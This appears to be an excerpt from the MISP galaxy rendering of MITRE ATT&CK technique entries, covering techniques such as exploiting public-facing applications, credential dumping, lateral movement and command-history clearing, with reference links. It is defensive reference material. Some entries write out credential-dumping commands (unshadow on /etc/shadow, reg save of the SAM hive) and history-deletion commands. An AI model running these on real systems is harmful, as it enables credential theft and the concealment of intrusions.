Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190"

Table 3342. Table References
Links
https://attack.mitre.org/techniques/T1190
https://nvd.nist.gov/vuln/detail/CVE-2016-6662
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/
https://us-cert.cisa.gov/ncas/alerts/TA18-106A
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://nvd.nist.gov/vuln/detail/CVE-2014-7169
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
https://cwe.mitre.org/top25/index.html

Untargeted client-side exploitation - T1370

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Untargeted client-side exploitation - T1370"

Table 3343. Table References
Links
https://attack.mitre.org/techniques/T1370

Non-Application Layer Protocol - T1095

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"

Table 3344. Table References
Links
https://attack.mitre.org/techniques/T1095
http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
http://support.microsoft.com/KB/170292
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Two-Factor Authentication Interception - T1111

Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user’s personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)

Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)

The tag is: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111"

Table 3345. Table References
Links
https://attack.mitre.org/techniques/T1111
https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

Host-based hiding techniques - T1314

Host based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)

The tag is: misp-galaxy:mitre-attack-pattern="Host-based hiding techniques - T1314"

Table 3346. Table References
Links
https://attack.mitre.org/techniques/T1314

Network-based hiding techniques - T1315

Technical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="Network-based hiding techniques - T1315"

Table 3347. Table References
Links
https://attack.mitre.org/techniques/T1315

Targeted client-side exploitation - T1371

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user’s computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted client-side exploitation - T1371"

Table 3348. Table References
Links
https://attack.mitre.org/techniques/T1371

Insecure Third-Party Libraries - T1425

For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Insecure Third-Party Libraries - T1425"

View relationships graph

Insecure Third-Party Libraries - T1425 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 3349. Table References
Links
https://attack.mitre.org/techniques/T1425

Exploit public-facing application - T1377

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).

The use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit public-facing application - T1377"

Table 3350. Table References
Links
https://attack.mitre.org/techniques/T1377

Search Victim-Owned Websites - T1594

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594"

Table 3351. Table References
Links
https://attack.mitre.org/techniques/T1594
https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/

/etc/passwd and /etc/shadow - T1003.008

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>

The tag is: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008"

Table 3352. Table References
Links
https://attack.mitre.org/techniques/T1003/008
https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

SMB/Windows Admin Shares - T1021.002

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)

The tag is: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002"

Table 3353. Table References
Links
https://attack.mitre.org/techniques/T1021/002
https://capec.mitre.org/data/definitions/561.html
https://en.wikipedia.org/wiki/Server_Message_Block
https://technet.microsoft.com/en-us/library/cc787851.aspx
http://support.microsoft.com/kb/314984
https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts
https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem
https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

Reduce Key Space - T1600.001

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Reduce Key Space - T1600.001"

Table 3354. Table References
Links
https://attack.mitre.org/techniques/T1600/001
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Security Account Manager - T1003.002

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

pwdumpx.exe
[gsecdump](https://attack.mitre.org/software/S0008)
[Mimikatz](https://attack.mitre.org/software/S0002)
secretsdump.py

Alternatively, the SAM can be extracted from the Registry with Reg:

<code>reg save HKLM\sam sam</code>
<code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.

The tag is: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002"

Table 3355. Table References
Links
https://attack.mitre.org/techniques/T1003/002
https://github.com/Neohapsis/creddump7

Disable Crypto Hardware - T1600.002

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Disable Crypto Hardware - T1600.002"

Table 3356. Table References
Links
https://attack.mitre.org/techniques/T1600/002
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Cached Domain Credentials - T1003.005

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)

With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

The tag is: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005"

Table 3357. Table References
Links
https://attack.mitre.org/techniques/T1003/005
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)
https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials
https://github.com/mattifestation/PowerSploit

Clear Command History - T1070.003

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003"

Table 3358. Table References
Links
https://attack.mitre.org/techniques/T1070/003
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

Exfiltration Over Bluetooth - T1011.001

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001"

Table 3359. Table References
Links
https://attack.mitre.org/techniques/T1011/001

Dead Drop Resolver - T1102.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"

Table 3360. Table References
Links
https://attack.mitre.org/techniques/T1102/001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Remote Desktop Protocol - T1021.001

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"

Table 3361. Table References
Links
https://attack.mitre.org/techniques/T1021/001
https://capec.mitre.org/data/definitions/555.html
https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

Internet Connection Discovery - T1016.001

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

The tag is: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001"

Table 3362. Table References
Links
https://attack.mitre.org/techniques/T1016/001

Patch System Image - T1601.001

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001"

Table 3363. Table References
Links
https://attack.mitre.org/techniques/T1601/001
https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf
https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf
http://2015.zeronights.org/assets/files/05-Nosenko.pdf
https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf
https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf
https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

Exfiltration over USB - T1052.001

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"

Table 3364. Table References
Links
https://attack.mitre.org/techniques/T1052/001

Downgrade System Image - T1601.002

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002"

Table 3365. Table References
Links
https://attack.mitre.org/techniques/T1601/002
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Windows Remote Management - T1021.006

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006"

Table 3366. Table References
Links
https://attack.mitre.org/techniques/T1021/006
http://msdn.microsoft.com/en-us/library/aa384426
https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2
https://msdn.microsoft.com/en-us/library/aa394582.aspx
https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

File Transfer Protocols - T1071.002

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002"

Table 3367. Table References
Links
https://attack.mitre.org/techniques/T1071/002
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Invalid Code Signature - T1036.001

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)

Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.

The tag is: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"

Table 3368. Table References
Links
https://attack.mitre.org/techniques/T1036/001
https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/

Local Data Staging - T1074.001

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

The tag is: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"

Table 3369. Table References
Links
https://attack.mitre.org/techniques/T1074/001

Application Access Token - T1550.001

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001"

Table 3370. Table References
Links
https://attack.mitre.org/techniques/T1550/001
https://capec.mitre.org/data/definitions/593.html
https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

SQL Stored Procedures - T1505.001

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)

The tag is: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001"

Table 3371. Table References
Links
https://attack.mitre.org/techniques/T1505/001
https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
https://blog.netspi.com/attacking-sql-server-clr-assemblies/

Archive via Utility - T1560.001

